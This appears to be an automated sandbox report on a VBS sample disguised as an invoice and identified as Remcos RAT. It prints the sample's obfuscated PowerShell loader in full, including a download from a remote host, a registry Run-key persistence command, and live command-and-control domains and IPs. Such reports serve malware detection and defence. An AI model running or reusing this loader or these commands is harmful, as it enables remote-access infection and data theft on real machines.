                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#servicetilbuds fangerne sidsernes cormidium brnesangen pouty #>;$tredjeverdenslandets='bilberries43';<#efterordenes fjedervgt soubrettens leftism radiography #>;$saltvandsfisk=$selvvirkendes+$host.ui; function pepperiness($klassesttet){if ($saltvandsfisk) {$envisaging++;}$possesses=$unlimned+$klassesttet.'length'-$envisaging; for( $multiciliated=4;$multiciliated -lt $possesses;$multiciliated+=5){$aithochroi56=$multiciliated;$politiskoler+=$klassesttet[$multiciliated];$opbyggeligste='weltanschauung';}$politiskoler;}function isopor($jomfrunalske){ & ($hovedkarakterer) ($jomfrunalske);}$folkeskoleomraadet=pepperiness 'isolmanlgoeffez noriessolganglin,ta lig/ bl, ';$folkeskoleomraadet+=pepperiness 'refr5ra e.spot0omda mulc(indtw disibespn dd dmodao a,cwkultsfedt ign avt ten fi.1slay0thom.unde0stav;ahop lo iw terikravnkurs6sis.4engr;tank hjrxopti6rhyp4incr; ete trasrgeo v ,es: yr1dile3 tai1 bio. alg0 pos)perp forsg outemaanczan.kcathobart/ che2vold0pauc1sluk0 chi0 s a1 ea0w.re1prog gynofbelvilokar ndeelegefhe sononrxnett/halv1,eta3ku m1data.upbu0 gui ';$efterords=pepperiness 'diktuphotsovere orlrk.od-job aforbg kofesy,bnrisitprog ';$ordreafgivelser=pepperiness 'unmehteletgrost enpimplsudtr:sols/mora/kanopov rlp rsi allesenslforstblyadb,nz.hy.etbil,or afpbakk/beast iscludtnlchile b esidio1barb8glut7time.f,agdmadke s lpdokul in osendysubc ';$haole=pepperiness 'tetr>wels ';$hovedkarakterer=pepperiness 'cockidumhe sinxanse ';$kontrahering='tekstlig';$jackhammer='\clothesman.vin';isopor (pepperiness 'thig$ bragstemlcordomarvbpostaethilcibo:overe psvte.mejagtlsatie,easede enarmhs asp=unit$brute ottns utvexpr:t,veaencrp haap ondalfaape st hofasymp+bobs$ kvsj en amatacmisaknoteh,orlatomempeptmprese oldrbus ');isopor (pepperiness 'hard$und gsociltveto woobpar anotal ead:skamfhestoudsirdraimdissa a tlpo,yidis skrameart s sen=chil$disioworrr eaddemor maeefigeaf gef drag limire.rvforaecuraled csreolekobbr cla.stats,lebp lisl laniboggts ag(h,po$semihma,iasnito.onploctreacet)told ');isopor (pepperiness ' und[swifnstabetsumt.agt.forusgeneeradircemev stritilnc .ekeoctopred.okleii sa ngav.t bscm,kraaunclnbnnea,nnigph,ce molr nrt] b,l:succ:musksprogev.rdcst.aufl.trd ndi flytjaywyjvnfppararwineoinfithummodolocrom osignlmidt cecr=foru excr[kaian.emie.lgttu ru. rhash,rpeve,ecendiuasterpro ilallt egeytuvapt anroutgofarmt tabodyrlcstauobobbl stutvoicy usspu saeatio]oec,:grat: esstmidnlchtes non1ca.o2ddsr ');$ordreafgivelser=$formalises[0];$gammel=(pepperiness 's it$predgestalle iouninbk alaentel sax:m drl niviintent kuiparmesvrtn cylubo.dm commcr deplicrsynteskylr disib,rrnp rsgjeopekravrskld= posn taoerepewdugp- geno adebmilij ti egalvcimprtpi.k autos maryfor.s,aratstudeunflmt,ta.skatnpepee ignthjem.dephwudtrehrigbdevacordsl forisalte ilinsy,cthust ');isopor ($gammel);isopor (pepperiness 'kvid$intelindbi nebnmilii tote hypnsnurureprmvit
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#servicetilbuds fangerne sidsernes cormidium brnesangen pouty #>;$tredjeverdenslandets='bilberries43';<#efterordenes fjedervgt soubrettens leftism radiography #>;$saltvandsfisk=$selvvirkendes+$host.ui; function pepperiness($klassesttet){if ($saltvandsfisk) {$envisaging++;}$possesses=$unlimned+$klassesttet.'length'-$envisaging; for( $multiciliated=4;$multiciliated -lt $possesses;$multiciliated+=5){$aithochroi56=$multiciliated;$politiskoler+=$klassesttet[$multiciliated];$opbyggeligste='weltanschauung';}$politiskoler;}function isopor($jomfrunalske){ & ($hovedkarakterer) ($jomfrunalske);}$folkeskoleomraadet=pepperiness 'isolmanlgoeffez noriessolganglin,ta lig/ bl, ';$folkeskoleomraadet+=pepperiness 'refr5ra e.spot0omda mulc(indtw disibespn dd dmodao a,cwkultsfedt ign avt ten fi.1slay0thom.unde0stav;ahop lo iw terikravnkurs6sis.4engr;tank hjrxopti6rhyp4incr; ete trasrgeo v ,es: yr1dile3 tai1 bio. alg0 pos)perp forsg outemaanczan.kcathobart/ che2vold0pauc1sluk0 chi0 s a1 ea0w.re1prog gynofbelvilokar ndeelegefhe sononrxnett/halv1,eta3ku m1data.upbu0 gui ';$efterords=pepperiness 'diktuphotsovere orlrk.od-job aforbg kofesy,bnrisitprog ';$ordreafgivelser=pepperiness 'unmehteletgrost enpimplsudtr:sols/mora/kanopov rlp rsi allesenslforstblyadb,nz.hy.etbil,or afpbakk/beast iscludtnlchile b esidio1barb8glut7time.f,agdmadke s lpdokul in osendysubc ';$haole=pepperiness 'tetr>wels ';$hovedkarakterer=pepperiness 'cockidumhe sinxanse ';$kontrahering='tekstlig';$jackhammer='\clothesman.vin';isopor (pepperiness 'thig$ bragstemlcordomarvbpostaethilcibo:overe psvte.mejagtlsatie,easede enarmhs asp=unit$brute ottns utvexpr:t,veaencrp haap ondalfaape st hofasymp+bobs$ kvsj en amatacmisaknoteh,orlatomempeptmprese oldrbus ');isopor (pepperiness 'hard$und gsociltveto woobpar anotal ead:skamfhestoudsirdraimdissa a tlpo,yidis skrameart s sen=chil$disioworrr eaddemor maeefigeaf gef drag limire.rvforaecuraled csreolekobbr cla.stats,lebp lisl laniboggts ag(h,po$semihma,iasnito.onploctreacet)told ');isopor (pepperiness ' und[swifnstabetsumt.agt.forusgeneeradircemev stritilnc .ekeoctopred.okleii sa ngav.t bscm,kraaunclnbnnea,nnigph,ce molr nrt] b,l:succ:musksprogev.rdcst.aufl.trd ndi flytjaywyjvnfppararwineoinfithummodolocrom osignlmidt cecr=foru excr[kaian.emie.lgttu ru. rhash,rpeve,ecendiuasterpro ilallt egeytuvapt anroutgofarmt tabodyrlcstauobobbl stutvoicy usspu saeatio]oec,:grat: esstmidnlchtes non1ca.o2ddsr ');$ordreafgivelser=$formalises[0];$gammel=(pepperiness 's it$predgestalle iouninbk alaentel sax:m drl niviintent kuiparmesvrtn cylubo.dm commcr deplicrsynteskylr disib,rrnp rsgjeopekravrskld= posn taoerepewdugp- geno adebmilij ti egalvcimprtpi.k autos maryfor.s,aratstudeunflmt,ta.skatnpepee ignthjem.dephwudtrehrigbdevacordsl forisalte ilinsy,cthust ');isopor ($gammel);isopor (pepperiness 'kvid$intelindbi nebnmilii tote hypnsnurureprmvit
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "sandsynliggrelsens" /t reg_expand_sz /d "%hexokinase% -windowstyle 1 $jordbundssammenstnings=(gp -path 'hkcu:\software\skulptureredes\').carlcorey;%hexokinase% ($jordbundssammenstnings)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /f /v "sandsynliggrelsens" /t reg_expand_sz /d "%hexokinase% -windowstyle 1 $jordbundssammenstnings=(gp -path 'hkcu:\software\skulptureredes\').carlcorey;%hexokinase% ($jordbundssammenstnings)"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#servicetilbuds fangerne sidsernes cormidium brnesangen pouty #>;$tredjeverdenslandets='bilberries43';<#efterordenes fjedervgt soubrettens leftism radiography #>;$saltvandsfisk=$selvvirkendes+$host.ui; function pepperiness($klassesttet){if ($saltvandsfisk) {$envisaging++;}$possesses=$unlimned+$klassesttet.'length'-$envisaging; for( $multiciliated=4;$multiciliated -lt $possesses;$multiciliated+=5){$aithochroi56=$multiciliated;$politiskoler+=$klassesttet[$multiciliated];$opbyggeligste='weltanschauung';}$politiskoler;}function isopor($jomfrunalske){ & ($hovedkarakterer) ($jomfrunalske);}$folkeskoleomraadet=pepperiness 'isolmanlgoeffez noriessolganglin,ta lig/ bl, ';$folkeskoleomraadet+=pepperiness 'refr5ra e.spot0omda mulc(indtw disibespn dd dmodao a,cwkultsfedt ign avt ten fi.1slay0thom.unde0stav;ahop lo iw terikravnkurs6sis.4engr;tank hjrxopti6rhyp4incr; ete trasrgeo v ,es: yr1dile3 tai1 bio. alg0 pos)perp forsg outemaanczan.kcathobart/ che2vold0pauc1sluk0 chi0 s a1 ea0w.re1prog gynofbelvilokar ndeelegefhe sononrxnett/halv1,eta3ku m1data.upbu0 gui ';$efterords=pepperiness 'diktuphotsovere orlrk.od-job aforbg kofesy,bnrisitprog ';$ordreafgivelser=pepperiness 'unmehteletgrost enpimplsudtr:sols/mora/kanopov rlp rsi allesenslforstblyadb,nz.hy.etbil,or afpbakk/beast iscludtnlchile b esidio1barb8glut7time.f,agdmadke s lpdokul in osendysubc ';$haole=pepperiness 'tetr>wels ';$hovedkarakterer=pepperiness 'cockidumhe sinxanse ';$kontrahering='tekstlig';$jackhammer='\clothesman.vin';isopor (pepperiness 'thig$ bragstemlcordomarvbpostaethilcibo:overe psvte.mejagtlsatie,easede enarmhs asp=unit$brute ottns utvexpr:t,veaencrp haap ondalfaape st hofasymp+bobs$ kvsj en amatacmisaknoteh,orlatomempeptmprese oldrbus ');isopor (pepperiness 'hard$und gsociltveto woobpar anotal ead:skamfhestoudsirdraimdissa a tlpo,yidis skrameart s sen=chil$disioworrr eaddemor maeefigeaf gef drag limire.rvforaecuraled csreolekobbr cla.stats,lebp lisl laniboggts ag(h,po$semihma,iasnito.onploctreacet)told ');isopor (pepperiness ' und[swifnstabetsumt.agt.forusgeneeradircemev stritilnc .ekeoctopred.okleii sa ngav.t bscm,kraaunclnbnnea,nnigph,ce molr nrt] b,l:succ:musksprogev.rdcst.aufl.trd ndi flytjaywyjvnfppararwineoinfithummodolocrom osignlmidt cecr=foru excr[kaian.emie.lgttu ru. rhash,rpeve,ecendiuasterpro ilallt egeytuvapt anroutgofarmt tabodyrlcstauobobbl stutvoicy usspu saeatio]oec,:grat: esstmidnlchtes non1ca.o2ddsr ');$ordreafgivelser=$formalises[0];$gammel=(pepperiness 's it$predgestalle iouninbk alaentel sax:m drl niviintent kuiparmesvrtn cylubo.dm commcr deplicrsynteskylr disib,rrnp rsgjeopekravrskld= posn taoerepewdugp- geno adebmilij ti egalvcimprtpi.k autos maryfor.s,aratstudeunflmt,ta.skatnpepee ignthjem.dephwudtrehrigbdevacordsl forisalte ilinsy,cthust ');isopor ($gammel);isopor (pepperiness 'kvid$intelindbi nebnmilii tote hypnsnurureprmvitJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "sandsynliggrelsens" /t reg_expand_sz /d "%hexokinase% -windowstyle 1 $jordbundssammenstnings=(gp -path 'hkcu:\software\skulptureredes\').carlcorey;%hexokinase% ($jordbundssammenstnings)"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /f /v "sandsynliggrelsens" /t reg_expand_sz /d "%hexokinase% -windowstyle 1 $jordbundssammenstnings=(gp -path 'hkcu:\software\skulptureredes\').carlcorey;%hexokinase% ($jordbundssammenstnings)"Jump to behavior
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager#
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2937740641.0000000007CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerM
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageri
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managert
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.drBinary or memory string: [Program Manager]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1012, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8BJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1012, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information321
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		321
                Scripting                		1
                DLL Side-Loading                		2
                Obfuscated Files or Information                		OS Credential Dumping1
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		312
                Process Injection                		1
                Software Packing                		LSASS Memory13
                System Information Discovery                		Remote Desktop ProtocolData from Removable Media11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter                		1
                Registry Run Keys / Startup Folder                		1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		Security Account Manager11
                Security Software Discovery                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		Login HookLogin Hook1
                Masquerading                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Modify Registry                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                Virtualization/Sandbox Evasion                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input Capture213
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items312
                Process Injection                		DCSync1
                Remote System Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538533 Sample: IMGRO Facturi nepl#U0103tit... Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 37 pelele.duckdns.org 2->37 39 gormezl_6777.6777.6777.677e 2->39 41 plieltd.top 2->41 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 55 9 other signatures 2->55 9 wscript.exe 1 2->9         started        12 powershell.exe 18 2->12         started        signatures3 53 Uses dynamic DNS services 37->53 process4 signatures5 57 VBScript performs obfuscated calls to suspicious functions 9->57 59 Suspicious powershell command line found 9->59 61 Wscript starts Powershell (via cmd or directly) 9->61 71 3 other signatures 9->71 14 powershell.exe 14 18 9->14         started        18 PING.EXE 1 9->18         started        63 Early bird code injection technique detected 12->63 65 Writes to foreign memory regions 12->65 67 Found suspicious powershell code related to unpacking or dynamic code loading 12->67 69 Queues an APC in another process (thread injection) 12->69 20 msiexec.exe 5 10 12->20         started        23 conhost.exe 12->23         started        process6 dnsIp7 43 plieltd.top 172.67.155.139, 443, 49737, 49744 CLOUDFLARENETUS United States 14->43 73 Found suspicious powershell code related to unpacking or dynamic code loading 14->73 25 conhost.exe 14->25         started        27 conhost.exe 18->27         started        45 pelele.duckdns.org 185.236.203.101, 49745, 49746, 49747 M247GB Romania 20->45 35 C:\ProgramData\remcos\logs.dat, data 20->35 dropped 75 Detected Remcos RAT 20->75 29 cmd.exe 1 20->29         started        file8 signatures9 process10 process11 31 conhost.exe 29->31         started        33 reg.exe 1 1 29->33         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs0%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                pelele.duckdns.org
                		185.236.203.101
                		truetrue
                  		unknown
                  plieltd.top
                  		172.67.155.139
                  		truefalse
                    		unknown
                    gormezl_6777.6777.6777.677e
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://plieltd.top/Tlles187.deployfalse
                        		unknown
                        https://plieltd.top/ZPepSmQfDUPElVSkiams84.binfalse
                          		unknown
                          pelele.duckdns.orgtrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://plieltd.toppowershell.exe, 00000003.00000002.1753278151.000001CB9DA00000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://plieltd.top/Tlles187.deployXR#lpowershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://plieltd.toppowershell.exe, 00000003.00000002.1753278151.000001CB9D2C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1753278151.000001CB9BEA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://go.micropowershell.exe, 00000003.00000002.1753278151.000001CB9C81E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
